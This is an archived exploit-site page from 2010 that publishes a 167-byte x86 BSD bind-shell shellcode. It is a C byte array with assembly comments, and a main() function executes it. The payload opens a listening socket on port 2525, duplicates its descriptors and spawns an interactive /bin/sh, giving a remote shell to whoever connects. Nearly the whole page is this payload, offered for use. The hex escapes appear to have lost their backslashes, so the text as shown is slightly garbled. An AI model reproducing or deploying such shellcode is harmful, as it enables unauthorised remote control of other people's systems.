bds/x86 bindshell on port 2525 shellcode 167 bytes
Posted on 23 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>bds/x86 bindshell on port 2525 shellcode 167 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== /* -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- * AUTHOR : beosroot * OS : BSDx86 (Tested on FreeBSD) * EMAIL : beosroot@hotmail.fr beosroot@null.net * GR33TZ To : joseph-h, str0ke, MHIDO55,..... */ const char shellcode[] = "x6ax00" // push $0x0 "x6ax01" // push $0x1 "x6ax02" // push $0x2 "x50" // push %eax "x6ax61" // push $0x61 "x58" // pop %eax "xcdx80" // int $0x80 "x50" // push %eax "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x68x10x02x09xdd" // push $0xdd090210 "x89xe0" // mov %esp,%eax "x6ax10" // push $0x10 "x50" // push %eax "xffx74x24x1c" // pushl 0x1c %esp "x50" // push %eax "x6ax68" // push $0x68 "x58" // pop $eax "xcdx80" // int $0x80 "x6ax01" // push $0x1 "xffx74x24x28" // pushl 0x28 %esp "x50" // push %eax "x6ax6a" // push $0x6a "x58" // pop $eax "xcdx80" // int $0x80 "x83xecx10" // sub $0x10,$esp "x6ax10" // push $0x10 "x8dx44x24x04" // lea 0x4%esp,%eax "x89xe1" // mov %esp,%ecx "x51" // push %ecx "x50" // push %eax "xffx74x24x4c" // pushl 0x4c %esp "x50" // push %eax "x6ax1e" // push %0x1e "x58" // pop %eax "xcdx80" // int $0x80 "x50" // push %eax "xffx74x24x58" // pushl 0x58 %esp "x50" // push %eax "x6ax06" // push $0x6 "x58" // pop %eax "xcdx80" // int $0x80 "x6ax00" // push $0x0 "xffx74x24x0c" // pushl 0xc %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x6ax01" // push $0x1 "xffx74x24x18" // pushl 0x18 %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x6ax02" // push $0x2 "xffx74x24x24" // pushl 0x24 %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x68x73x68x00x00" // push $0x6873 "x89xe0" // mov %esp,%eax "x68x2dx69x00x00" // push $0x692d "x89xe1" // mov %esp,%ecx "x6ax00" // push $0x0 "x51" // push %ecx "x50" // push %eax "x68x2fx73x68x00" // push $0x68732f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe0" // mov %esp,%eax "x8dx4cx24x08" // lea 0x8 %esp,%ecx "x6ax00" // push $0x0 "x51" // push %ecx "x50" // push %eax "x50" // push %eax "x6ax3b" // push $0x3b "x58" // pop %eax "xcdx80"; // int $0x80 int main() { void (*hell)() = (void *)shellcode; return (*(int(*)())shellcode)(); } // the end o.O ] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
